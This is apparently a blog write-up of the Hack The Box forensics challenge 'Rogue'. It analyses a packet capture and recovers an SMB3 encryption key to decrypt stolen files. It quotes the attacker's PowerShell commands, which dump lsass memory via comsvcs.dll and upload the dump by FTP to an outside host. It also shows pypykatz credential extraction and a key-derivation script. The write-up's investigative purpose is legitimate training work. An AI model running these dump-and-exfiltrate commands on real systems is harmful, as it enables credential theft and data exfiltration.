Post

HTB • Rogue

Rogue is a medium-difficulty forensics challenge created by thewildspirit on Hack The Box where we are given a packet capture with possibly malicious traffic. Our goal is to find out how the adversary accessed the sensitive shared folder, and what information they stole. The adversary used the encrypted SMB3 protocol to access the share, but we were able to recover the encryption key used in the traffic and subsequently recover what information was stolen along with the flag.

SecCorp has reached us about a recent cyber security incident. They are confident that a malicious entity has managed to access a shared folder that stores confidential files. Our threat intel informed us about an active dark web forum where disgruntled employees offer to give access to their employer’s internal network for a financial reward. In this forum, one of SecCorp’s employees offers to provide access to a low-privileged domain-joined user for 10K in cryptocurrency. Your task is to find out how they managed to gain access to the folder and what corporate secrets did they steal.

Reverse Shell

We’ll be using Wireshark to analyze capture.pcapng.

On the first few lines of the packet capture, we can see that there is a TCP connection between 192.168.1.14:50021 and 77.74.198.52:4444. The port number 4444 is often used by attackers in reverse shell sessions, so let’s follow that TCP stream by right-clicking the first packet, and going to Follow > TCP Stream.

Reverse shell session The adversary runs PowerShell commands over a reverse shell session on port 4444

It does seem to be a reverse shell. The attacker runs a few enumeration commands and finds out that they are a local administrator. Then they run the following statements:

1
2
3
4
5
6
7
8
9
10
Remove-Item -Path C:\windows\temp\3858793632.pmd -Force -ErrorAction Ignore
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id C:\windows\temp\3858793632.pmd full | out-host
Compress-Archive  C:\windows\temp\3858793632.pmd  C:\windows\temp\3858793632.zip
Remove-Item -Path C:\windows\temp\3858793632.pmd -Force -ErrorAction Ignore
$cl = New-Object System.Net.WebClient
$f = "C:\windows\temp\3858793632.zip"
$s = "ftp://ftpuser:SZC0aBomFG@windowsliveupdater.com/3858793632.zip"
$u = New-Object System.Uri($s)
$cl.UploadFile($u, $f)
Remove-Item -Path C:\windows\temp\3858793632.zip -Force -ErrorAction Ignore

This would create a memory dump of the lsass.exe process, compress it, and upload it to an FTP server at windowsliveupdater.com which probably resolves to an attacker-controlled address from a poisoned DNS entry.

FTP

Since FTP is a plaintext protocol, we can recover the uploaded file 3858793632.zip with Wireshark. We’ll use the filter ftp-data, follow the TCP stream, then export it as raw bytes.

FTP Export exporting the file transferred in plain text using FTP

When you view a stream in Wireshark, you should save the stream to a file only after all of the packets have loaded so that the file is complete.

The file 3858793632.zip does seem to be a zip file, so we’ll go ahead and extract 3858793632.pmd.

1
2
3
file 3858793632.zip # Check file type
7z l 3858793632.zip # Validate archive / list files
7z x 3858793632.zip # Extract files

A memory dump of the lsass.exe process would be valuable to the adversary because it often holds sensitive information like plaintext passwords, NTLM hashes, etc. Let’s follow the attacker’s path and extract any credentials from the dump with PyPyKatz.

1
pypykatz lsa minidump ./3858793632.pmd --json -o dump.json

Now we should have some credentials stored in the file dump.json. Before we go any further, let’s see if we can find evidence of the adversary accessing the sensitive share mentioned in the challenge description.

SMB

Sorting the packets with the filter smb or smb2, we can see that a network share called ConfidentialShare is accessed, but we cannot view any of the accessed files within the share because the top layer is encrypted.

Recovering the Key

We search for possible ways to decrypt the SMB3 packets and eventually run into this wonderful post which tells us that we need the following parameters to recover the session encryption key:

  • Username
  • Workgroup
  • Password or NT hash
  • NTProofStr
  • Encrypted session key

The user who accessed the share happens to be athomson under the workgroup CORP, and both NTProofStr and the encrypted session key can be found in the packet capture. It also turns out, we already have the NT hash for this user in dump.json, which we recovered from the memory dump.

1
jq '..|select(.username=="athomson")?|.NThash' ./dump.json

Now that we have all the required parameters, we’ll build a program based on information from the post mentioned earlier to recover the session encryption key.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import hmac
from Crypto.Cipher import ARC4
from Crypto.Hash import MD5

# SESSION 0x0000a00000000015
USERNAME = 'athomson'
WORKGROUP = 'CORP'
NTHASH = bytes.fromhex('88d84bad705f61fcdea0d771301c3a7d')
NTPROOF = bytes.fromhex('d047ccdffaeafb22f222e15e719a34d4')
ENCSESSION = bytes.fromhex('032c9ca4f6908be613b240062936e2d2')

ud = (USERNAME + WORKGROUP).upper().encode('UTF-16LE')
rknt = hmac.new(NTHASH, ud, MD5).digest()
kek = hmac.new(rknt, NTPROOF, MD5).digest()
rsk = ARC4.new(kek).decrypt(ENCSESSION)
print(rsk.hex())

The program should print the key 9ae0af5c19ba0de2ddbe70881d4263ac.

Encrypted File Recovery

We’ll use Wireshark’s tshark command to decrypt the SMB3 packets and export the available files.

1
2
3
4
session="1500000000a00000" # The SMB session ID
enc_key="9ae0af5c19ba0de2ddbe70881d4263ac" # The encryption key
mkdir files # Create output directory
tshark -r ./capture.pcapng "-ouat:smb2_seskey_list:$session,$enc_key,"'"",""' --export-objects smb,files

Then we can find the flag on the third page of the exported PDF document within the output directory.

Recovered document The flag hiding in the recovered document

This post is licensed under CC BY 4.0 by the author.